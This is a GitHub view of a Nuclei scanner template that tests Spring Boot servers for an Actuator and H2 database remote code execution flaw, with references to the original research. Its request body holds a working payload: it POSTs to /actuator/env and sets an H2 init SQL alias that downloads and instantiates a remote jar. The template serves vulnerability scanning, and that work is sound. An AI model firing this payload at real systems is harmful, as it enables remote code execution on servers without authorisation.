forked from projectdiscovery/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathspringboot-h2-db-rce.yaml
40 lines (36 loc) · 1.31 KB
/
springboot-h2-db-rce.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
id: springboot-h2-db-rce
info:
name: Spring Boot H2 Database RCE
author: dwisiswant0
severity: critical
# Payload taken from @pyn3rd (Twitter), see reference[2].
# References:
# - [1] https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database
# - [2] https://twitter.com/pyn3rd/status/1305151887964946432
# - [3] https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
# - [4] https://github.com/spaceraccoon/spring-boot-actuator-h2-rce
requests:
- method: POST
path:
- "{{BaseURL}}/actuator/env"
headers:
Content-Type: "application/json"
body: |
{
"name": "spring.datasource.hikari.connection-init-sql",
"value":"CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName(\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$; CALL remoteUrl()"
}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "\"spring.datasource.hikari.connection-init-sql\":\""
condition: and
part: body
- type: word
words:
- "application/vnd.spring-boot.actuator"
part: header